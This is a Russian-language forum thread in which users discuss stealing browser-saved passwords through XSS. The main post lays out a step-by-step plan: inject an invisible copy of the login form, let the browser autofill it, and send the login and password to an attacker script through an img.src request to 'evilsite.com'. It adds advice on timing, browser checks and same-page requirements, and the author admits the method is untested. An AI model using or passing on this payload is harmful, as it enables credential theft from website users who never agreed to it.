Есть возможность внедрить html код на сайт(тем или иным способом). Браузеры сохранят пароли и подставлют их в формы. Можно ли внедрить форму с паролем. и джаваскрипт который бы утащил бы его? У меня удавалось так красть пароли уже с готовой формы(браузер: хром).
Да, можно. Можно внедрить форму ввода пароля, и закрыть текущую форму, если она есть. Все зависит от того, какие именно символы внедряются.
Либо замена самой формы на стороннюю где и будет оседать пароль, либо внедрение в форму посыла на сниффер, но тогда только получишь куки на не пароль.
хм, ребят, что-то вы усложняете. я не в курсе, как работает жезл в Академическом Театре, но в лисе при определенных настройках (включенной "Сохранять пароли для сайтов" и отключенной "Мастер-пароль") браузер очень несекурно запоминает пароли - если пользователь с этим согласился, то, имея активку на сайте, мы ПО ИДЕЕ можем утащить логин и пароль юзера очень просто. План таков - вставляем в страничку js, который добавляет в документ точно такую же форму, как на логинке, но невидимую, у которой в свойстве onsubmit выполнение своей функции. эта функция добавляет в документ невидимый ифрейм, в свойстве src у которого будет наш сайт, вернее скрипт на нем, который принимает логины и пароли; можно также юзать не ифрейм, а картинку. При этом в качестве параметров для скрипта на нашем сайте передаем логин и пароль из формы, которые вытащит та же функция по таймауту, а лучше не по таймауту, а в зависимости от события, когда загрузится вся страница: лиса только тогда вставляет логин и пароль. итак, что имеем: 1. пользователь заходит на страницу с xss 2. грузится наш js, который: а) добавляет на страницу невидимую форму, идентичную форме логинки, но с onsubmit="our_function(); return false;" б) our_function() добавляет невидимую картинку с нашего сайта с img.src="http://evilsite.com/xss.php?login=" + document.getElementById("input_login").innerHtml + "&pass=" + document.getElementById("input_pass").innerHtml в) как только загрузится весь документ + еще пару секунд (на всякий пожарный) js сабмитит добавленную форму 3. ??? 4. PROFIT Естественно, айдишники элементов будут другими, тут они для примера. Еще бы желательно добавить проверку браузера. Ах да, еще один момент - xss должна быть в том же документе (с тем же URI), что и форма логинки. то есть если юзер логинится на http://site.com/index.html, то бесполезно вставлять xss на http://site.com/index1.html - браузер просто не вставит туда пароль. это, кстати, и избавляет нас от такой фигни, как кража паролей на почтовиках - форма логинки расположена не в том документе, в который взломщик теоретически может проинжектить свой код. И последнее - все вышеописанное я не проверял, но по логике работать должно. Если проверите и оно не пашет - можно писать в ПМ или лучше сюда, посмотрим, что да как.